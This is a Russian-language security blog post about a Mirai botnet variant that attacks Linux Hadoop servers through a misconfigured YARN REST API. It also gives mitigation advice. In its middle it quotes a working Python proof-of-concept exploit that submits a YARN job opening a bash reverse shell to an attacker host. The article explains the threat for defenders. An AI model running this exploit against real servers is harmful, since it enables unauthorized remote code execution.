Кроме IoT: ботнет Mirai начал атаковать машины на Linux

Ботнет Mirai появился в 2016 году и за короткое время успел заразить ^[1] более 600 тыс. IoT-устройств. На прошлой неделе стало известно ^[2] о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».

^[3]
/ Flickr / D J Shin ^[4] / CC BY-SA ^[5]

Пара слов о Mirai

Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn ^[6], что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.

Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».

В конце 2016 года разработчики выложили исходные коды ^[7] вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.

Ботнет «вербует» Linux

Отчет ^[8] о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.

Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.

При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. Затем хакеры устанавливают DDoS-ботов вручную.

Какую уязвимость используют

Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.

При неверной конфигурации YARN атакующий может получить ^[9] доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно ^[10] уже несколько лет — на ExploitDB ^[11] и GitHub ^[12] опубликованы PoC-эксплоиты.

Например, на GitHub представлен следующий код ^[13] эксплойта:

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.

Что говорят эксперты

По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.

Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают ^[14], что это лишь вопрос времени.

Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.

Кроме IoT: ботнет Mirai начал атаковать машины на Linux - 2
/ Flickr / Jelene Morris ^[15] / CC BY ^[16]

Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.

Для защиты от атаки нужно изменить настройки ^[9] безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.

Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.

Несколько постов из блога VAS Experts:

Ботнет «спамит» через роутеры — что нужно знать ^[17]

Внедрение IPv6 — FAQ для интернет-провайдеров ^[18]

DDOS и 5G: толще «труба» — больше проблем ^[19]

Пара свежих материалов из нашего блога на Хабре:

Как будут запускать Starlink — спутниковый интернет от Илона Маска ^[20]

На замену TCP: протокол QUIC готов для внедрения [но не готов стать RFC] ^[21]

Автор: VASExperts

Источник ^[22]

Сайт-источник PVSM.RU: https://www.pvsm.ru

Путь до страницы источника: https://www.pvsm.ru/linux/300792

Ссылки в тексте:

[1] заразить: https://www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet/

[2] стало известно: https://www.theregister.co.uk/2018/11/22/mirai_for_linux_on_x86/

[3] Image: https://habr.com/company/vasexperts/blog/431686/

[4] D J Shin: https://commons.wikimedia.org/wiki/File:Schylling_%E2%80%93_Replica_Atomic_Robot_Man_%E2%80%93_Four_Mechanic_Angels_of_Destruction.jpg

[5] CC BY-SA: https://creativecommons.org/licenses/by-sa/3.0/

[6] крупного DNS-провайдера Dyn: https://en.wikipedia.org/wiki/2016_Dyn_cyberattack

[7] исходные коды: https://xakep.ru/2016/10/03/mirai-source-code/

[8] Отчет: https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/

[9] может получить: https://medium.com/@neerajsabharwal/hadoop-yarn-hack-9a72cc1328b6

[10] проблеме известно: http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

[11] ExploitDB: https://www.exploit-db.com/exploits/45025/

[12] GitHub: https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

[13] представлен следующий код: https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py

[14] предупреждают: https://www.extrahop.com/company/blog/2018/detect-demonbot-exploiting-hadoop-yarn-remote-code-execution/

[15] Jelene Morris: https://www.flickr.com/photos/jelene/2594095295

[16] CC BY: https://creativecommons.org/licenses/by/2.0/

[17] Ботнет «спамит» через роутеры — что нужно знать: https://vasexperts.ru/blog/bezopasnost/botnet-spamit-cherez-routery/

[18] Внедрение IPv6 — FAQ для интернет-провайдеров: https://vasexperts.ru/blog/seti/vnedrenie-ipv6-faq-dlya-internet-provajderov/

[19] DDOS и 5G: толще «труба» — больше проблем: https://vasexperts.ru/blog/bezopasnost/ddos-i-5g-tolshhe-truba-bolshe-problem/

[20] Как будут запускать Starlink — спутниковый интернет от Илона Маска: https://habr.com/company/vasexperts/blog/430136/

[21] На замену TCP: протокол QUIC готов для внедрения [но не готов стать RFC]: https://habr.com/company/vasexperts/blog/429380/

[22] Источник: https://habr.com/post/431686/?utm_campaign=431686

Нажмите здесь для печати.